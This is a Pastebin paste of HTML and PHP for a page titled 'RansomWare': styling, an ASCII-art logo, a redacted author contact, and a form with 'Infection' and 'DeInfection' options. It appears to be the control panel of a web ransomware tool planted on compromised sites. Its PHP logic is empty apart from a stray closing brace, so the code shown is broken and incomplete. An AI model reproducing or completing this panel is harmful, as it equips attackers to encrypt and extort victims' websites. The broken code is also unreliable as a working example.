Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!DOCTYPE html>
- <html>
- <head>
- <title>RansomWare</title>
- <style type="text/css">
- body {
- background: #1A1C1F;
- color: #e2e2e2;
- }
- .inpute{
- border-style: dotted;
- border-color: green;
- background-color: transparent;
- color: green;
- text-align: center;
- }
- .selecte{
- border: 0px dotted gray;
- border-color: green;
- background-color: transparent;
- color: green;
- }
- .submite{
- border: 1px dotted gray;
- border-color: red;
- background-color: transparent;
- color: white;
- }
- .result{
- text-align: left;
- }
- </style>
- <link rel="stylesheet" type="text/css" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css">
- </head>
- <body>
- <div class="result">
- <?php
- ?>
- <center>
- <font color="#19f211" style="text-shadow: 3px 3px 9px #19f211; font-size: 12px;">
- <pre>
- .:/+ossso+/:.
- :ohddyso+++osyddho-
- `/hdy+- `` `-+hdy:
- -hdy- -ohdddy+. :ydy.
- :dd+ /dd+..-+dd- `odh-
- .dd/ hdo sds odh`
- ody :/. -/: `hd+
- ydo -yhhhhhhhhhhhy. yds
- yds +ddddh:`.hdddd: ydo
- /dd. +ddddy `hdddd: -dd:
- ydy` +ddddd+ oddddd: .hds
- `ydy- -yhhhhhhhhhhhy. :hds`
- /hds- :ydh/
- `+hdho:.` `-/ohdy/`
- -+shddhhhhdddhs/.
- `.-:::-.`
- </font>
- Ransomeware
- -[ Contact : <font color="#19f211" style="text-shadow: 3px 3px 9px #19f211; font-size: 12px;">[email protected] </font>]-
- </pre>
- <form action="" method="post" style=" text-align: center;">
- <select name="method" class="selecte">
- <option value="1">Infection</option>
- <option value="2">DeInfection</option>
- </select>
- <input type="submit" name="submit" class="submite" value="Submit" />
- </form>
- <?php
- }?>
- </div>
- </body>
Advertisement
Add Comment
Please, Sign In to add comment